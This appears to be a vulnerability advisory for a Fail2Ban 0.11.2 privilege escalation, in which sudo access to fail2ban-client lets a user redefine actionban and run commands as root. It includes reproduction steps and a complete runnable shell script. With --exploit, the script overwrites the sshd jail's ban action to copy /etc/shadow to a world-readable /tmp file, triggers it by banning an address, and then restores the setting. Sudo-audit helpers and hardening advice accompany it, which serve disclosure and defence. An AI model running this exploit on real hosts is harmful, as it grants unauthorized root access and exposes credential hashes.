Fail2Ban
cpe:2.3:a:fail2ban:fail2ban:*:*:*:*:*:*:*
- 0.11.2
A vulnerability in Fail2Ban 0.11.2 allows a user whose sudo rules grant control of the Fail2Ban client or service to execute arbitrary commands as root. The issue is one of insecure permissions rather than a parsing bug: the commands Fail2Ban runs when it bans an address are ordinary action properties, and a user who can run fail2ban-client via sudo can redefine them at runtime. The fail2ban server, which runs with elevated rights, then executes whatever command the action holds. The attacker triggers execution by banning an IP address through the client, or by producing log entries that a filter matches, either of which pushes the replaced command through Fail2Ban's action processing pipeline.
Successful exploitation yields command execution as the Fail2Ban runtime user, which is root in the standard service configuration, and therefore full control of the host. The same access lets the attacker alter Fail2Ban jails and actions at runtime, for example unbanning addresses, stopping jails, or otherwise changing the service's behavior.
To reproduce, install Fail2Ban 0.11.2 and confirm that the server is running (fail2ban-client ping answers with pong). The attacker is a user whose sudo rules allow fail2ban-client. Begin by restarting the Fail2Ban service with sudo if it is not already running. Next, use the client to overwrite the actionban command of an existing action in a jail with a command of the attacker's choosing, such as copying a sensitive file to a world-readable location. Then trigger the action by banning an IP address through the client; the server executes the replaced command as root. Finally, verify that the command ran by checking that the copied file exists and is readable at the destination.
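The procedure above as an added, runnable script (example code written for this page, not part of Fail2Ban or the original advisory). It assumes a jail named sshd using the iptables-multiport action, the test address 203.0.113.5 and a marker path under /tmp, none of which the page states. The sudo -l check inspects only the rule lines of the output, and fail2ban-client ping stands in for the restart step as the liveness check, since the actionban override applies to the already-running server.

```shell
#!/bin/sh
# Added example; not code from the Fail2Ban project or the original advisory.
# Assumptions (not from the page): jail "sshd", action "iptables-multiport",
# the test address 203.0.113.5, and the marker path /tmp/f2b-root-proof.

# Precondition: the account's `sudo -l` output grants fail2ban-client,
# fail2ban-server or control of the fail2ban service. Only the rule lines
# (those starting with "(user)") are inspected, not the banner text.
# Usage: sudo_exposes_fail2ban "$(sudo -l 2>/dev/null)"
sudo_exposes_fail2ban() {
    printf '%s\n' "$1" |
        grep -E '^[[:space:]]*\(' |
        grep -Eq 'fail2ban(-client|-server)?([[:space:]]|$)'
}

# List the granting rule lines so the operator sees exactly what is reachable.
fail2ban_sudo_rules() {
    printf '%s\n' "$1" |
        grep -E '^[[:space:]]*\(' |
        grep -E 'fail2ban' |
        sed 's/^[[:space:]]*//'
}

# How the client is invoked. Overridable so the sequence can be recorded or
# dry-run without sudo.
F2B="${F2B:-sudo fail2ban-client}"

# Steps 2 and 3 of the advisory: replace the ban command of <action> in <jail>,
# then ban an address so the root-owned server runs the replacement. Fail2Ban
# expands <name> tags inside action strings, so keep angle brackets out of cmd.
override_ban_action() {
    jail=$1; action=$2; cmd=$3; ip=$4
    $F2B set "$jail" action "$action" actionban "$cmd" >/dev/null || return 1
    $F2B set "$jail" banip "$ip" >/dev/null || return 1
}

# Cleanup: lift the ban and put the original actionban back.
restore_ban_action() {
    jail=$1; action=$2; orig=$3; ip=$4
    $F2B set "$jail" unbanip "$ip" >/dev/null
    $F2B set "$jail" action "$action" actionban "$orig" >/dev/null
}

# Step 4: the proof is a copy of a root-only file that is now readable by us.
proof_present() {
    [ -r "$1" ]
}

# Run end to end only when asked; otherwise the file just defines the functions.
if [ "${1:-}" = "--exploit" ]; then
    RULES=$(sudo -l 2>/dev/null || true)
    if ! sudo_exposes_fail2ban "$RULES"; then
        echo "sudo -l grants nothing fail2ban-related; precondition not met" >&2
        exit 1
    fi
    fail2ban_sudo_rules "$RULES"
    $F2B ping >/dev/null || { echo "fail2ban server is not running" >&2; exit 1; }
    PROOF=/tmp/f2b-root-proof
    ORIG=$($F2B get sshd action iptables-multiport actionban)
    override_ban_action sshd iptables-multiport \
        "cp /etc/shadow $PROOF && chmod 0644 $PROOF" 203.0.113.5 || exit 1
    sleep 1   # give the server's action thread a moment to run the ban command
    if proof_present "$PROOF"; then
        echo "actionban ran as root: $PROOF is readable"
    else
        echo "no proof file; check the action name with: $F2B get sshd actions" >&2
    fi
    restore_ban_action sshd iptables-multiport "$ORIG" 203.0.113.5
fi
```

Invoke the script with --exploit to run the sequence end to end; without arguments it only defines the functions, so the audit helpers can be sourced from a hardening check. For defenders the practical caveat is that a sudo grant on fail2ban-client that admits set subcommands is a root grant: either remove it or constrain it to the exact read-only invocations an operator needs.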